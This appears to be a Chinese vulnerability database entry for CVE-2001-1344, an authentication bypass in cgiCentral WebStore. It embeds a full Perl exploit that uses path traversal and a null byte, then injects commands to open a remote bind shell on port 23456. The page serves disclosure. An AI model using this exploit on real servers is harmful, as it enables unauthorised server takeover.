CVE-2001-1344
CVSS7.5
发布时间 :2001-06-12 00:00:00
修订时间 :2008-09-05 16:26:18
NMCOES    

[原文]WSSecurity.pl in WebStore allows remote attackers to bypass authentication by providing the program with a filename that exists, which is made easier by (1) inserting a null character or (2) .. (dot dot).


[CNNVD]cgiCentral Webstore管理员认证绕过漏洞(CNNVD-200106-062)

        CVE(CAN) ID: CAN-2001-1344
        
        
        
        cgiCentral Webstore是一个在线购物程序,由于没有过滤用户输入的"../"和
        
        "null"字符,导致用户可能绕过管理员认证,直接成为该系统的管理员。
        
        
        
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:cgicentral:webstore_400:4.14
cpe:/a:cgicentral:webstore_400cs:4.14

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1344
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1344
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-062
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/6685.php
(VENDOR_ADVISORY)  XF  webstore-cgi-command-execution(6685)
http://www.securityfocus.com/bid/2860
(VENDOR_ADVISORY)  BID  2860
http://archives.neohapsis.com/archives/bugtraq/2001-06/0142.html
(UNKNOWN)  BUGTRAQ  20010612 bug

- 漏洞信息

cgiCentral Webstore管理员认证绕过漏洞
高危 输入验证
2001-06-12 00:00:00 2005-10-20 00:00:00
远程  
        CVE(CAN) ID: CAN-2001-1344
        
        
        
        cgiCentral Webstore是一个在线购物程序,由于没有过滤用户输入的"../"和
        
        "null"字符,导致用户可能绕过管理员认证,直接成为该系统的管理员。
        
        
        
        

- 公告与补丁

        
        
        我们建议您暂时停止使用此CGI程序,直到得到补丁或者更新版本。
        
        
        
        厂商补丁:
        
        
        
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
        
        的主页以获取最新版本:
        
        
        
        
        http://www.cgicentral.net/

        

- 漏洞信息 (20914)

cgiCentral WebStore 400 Administrator Authentication Bypass Vulnerability (EDBID:20914)
cgi remote
2001-05-06 Verified
0 Igor Dobrovitski
N/A [点击下载]
source: http://www.securityfocus.com/bid/2860/info

cgiCentral's Webstore is an shopping cart application which processes and manages online purchases.

A vulnerability exists in Webstore which may allow attackers to obtain administrative privileges. The vulnerability is due to a lack of filtering NULL bytes and occurs during the authentication process.

In combination with BID 2861, an attacker may be able to execute arbitrary commands on a webserver running Webstore.
Bugtraq ID 2861 describes a vulnerability involving un-checked user input being passed to system(). The vulnerable part of the script can only be executed by clients with administrative privileges. This vulnerability may allow a remote attacker to exploit BID 2861 and execute commands on the webserver. 

#!/usr/bin/perl -w
# Sun, May 6, 2001
# exploit by Igor Dobrovitski, noident@my-deja.com
# The exploit is for the default set-up. A good way to test if your (your neighbour's :) server
# is vulnerable. Only for Unix, will now work on NT
# Enjoy
use Socket;
$| = 1;
####################################################################################################
$msgfile = '../../Statistics/WebStore_Access.counter';
$userfile = '../Statistics/WebStore_Access.counter';
# if the sploit doesn't work with the above values, comment them out and uncomment ones below
#$msgfile = '../../ws_delete_files.cron';
#$userfile = '../ws_delete_files.cron';
# or these if the above fails:
#$msgfile = '../../Statistics/index.html';
#$userfile = '../Statistics/index.html';
$exec_code = 'use Socket;$protocol = getprotobyname(tcp);socket(SOCK, PF_INET, SOCK_STREAM, $protocol)
;setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, 1);$port=23456;bind(SOCK, sockaddr_in($port, INADDR_ANY));
listen(SOCK, 1);accept (NEW, SOCK);if(!fork()){open STDIN, "<&NEW"; open STDOUT, ">&NEW";open STDERR,
">&NEW";exec "/bin/sh -i"}else{close NEW;exit;}';
####################################################################################################
unless(defined $ARGV[0]) {die "Usage: $0 www.example.com/cgi-bin/ws_mail.cgi\n"}
$ARGV[0] =~ s|^(?:http://)*(.*/).*(\..*)$|${1}ws_mail$2|;
($host, $scriptpath) = $ARGV[0] =~ m|^(.*?)(/.*)$|;
$userfile .= '\0';
$sh_cmd = '55555;perl=\'perl\';test -x /usr/bin/perl && perl=\'/usr/bin/perl\';test -x /usr/local/bin/
perl && perl=\'/usr/local/bin/perl\';$perl -e \'' . $exec_code . '\'';
# the above is what's passed to the 'system' command as part of an argument
$form = makeform({'userfile' => $userfile, 'kill' => $sh_cmd, 'terminate' => 'whatever',
                  'admin' => 'yep', 'restart' => 'pls', 'msgfile' => $msgfile});
print "Engaging the enemy. Please stand by...\n";
$SIG{ALRM} = sub { print STDERR "Timeout was expected. The shell awaits you on port 23456\nHave fun an
d be nice to the server.\n"; exit };
alarm(20);
&send($form);
&oops_the_sploit_did_not_work();

sub makeform
{
    my $string;
    my @blah;
    my $line  = '';
    my $here;
    my %data = %{$_[0]};
    foreach my $key (keys %data)
    {
        $line .= "$key" . 'AAAA' . "$data{$key}" . 'BBBB';
    }
    $line =~ s|^(.*)BBBB$|$1|;
    $line =~ s/\\n/\n/g;
    $line =~ s/\\t/\t/g;
    $line =~ s/\\e/\e/g;
    $line =~ s/\\f/\f/g;
    $line =~ s/\\r/\r/g;
    $line =~ s/\\0/\0/g;
    foreach my $char (split //, $line)
    {
        if($char !~ m/[A-Za-z0-9._ ]/)
        {
            $char = unpack "H2", $char;
            $char = '%' . "$char";
        }
        push @blah, $char;
    }
    $string = join "",@blah;
    $string =~ s/AAAA/=/g;
    $string =~ s/BBBB/&/g;
    $string =~ s/ /+/g;
    my $cont_len = length($string);
$here = <<EOF;
POST $scriptpath HTTP/1.0
User-Agent: Mozilla (Windows 98)
Host: $host
referer: $host
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
Content-type: application/x-www-form-urlencoded
Content-length: $cont_len

$string
EOF
    return $here;
}

sub send
{
    my $form_to_send = shift;
    my $h = inet_aton($host) or die "Forward lookup for $host failed\n";
    socket(S,PF_INET,SOCK_STREAM,6) or die "socket prolems\n";
    unless(connect(S,sockaddr_in(80,$h))) {print STDERR "Couldn't connect to " . inet_ntoa($h) . "\n"
; close(S); exit 1 }
    select(S);
    $|=1;
    print "$form_to_send";
    my @reply=<S>;
    select(STDOUT);
    close(S);
    return @reply;
}

sub oops_the_sploit_did_not_work
{
    print STDERR "The exploit didn't work on this host\nSorry...\n";
    exit;
}
		

- 漏洞信息

6764
WebStore WSSecurity.pl Traversal Authentication Bypass
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

WebStore contains a flaw that allows a remote attacker to access password protected parts of the website. The issue is due to the script not properly sanitizing user input, specifically traversal (../../) and NULL byte poisoning (%00) style attacks supplied via the $filename variable.

- 时间线

2001-06-12 Unknow
2001-06-12 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

cgiCentral Webstore Administrator Authentication Bypass Vulnerability
Input Validation Error 2860
Yes No
2001-06-12 12:00:00 2009-07-11 06:56:00
This vulnerability was discovered by and was submitted to BugTraq by Deja User <noident@my-deja.com> on June 12th, 2001.

- 受影响的程序版本

cgiCentral WebStore 400CS 4.14
cgiCentral WebStore 400 4.14

- 漏洞讨论

cgiCentral's Webstore is an shopping cart application which processes and manages online purchases.

A vulnerability exists in Webstore which may allow attackers to obtain administrative privileges. The vulnerability is due to a lack of filtering NULL bytes and occurs during the authentication process.

In combination with BID 2861, an attacker may be able to execute arbitrary commands on a webserver running Webstore.
Bugtraq ID 2861 describes a vulnerability involving un-checked user input being passed to system(). The vulnerable part of the script can only be executed by clients with administrative privileges. This vulnerability may allow a remote attacker to exploit BID 2861 and execute commands on the webserver.

- 漏洞利用

Exploit code written by Igor Dobrovitski &lt;noident@my-deja.com&gt;. This script exploits this vulnerability to exploit Bugtraq ID 2681:

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站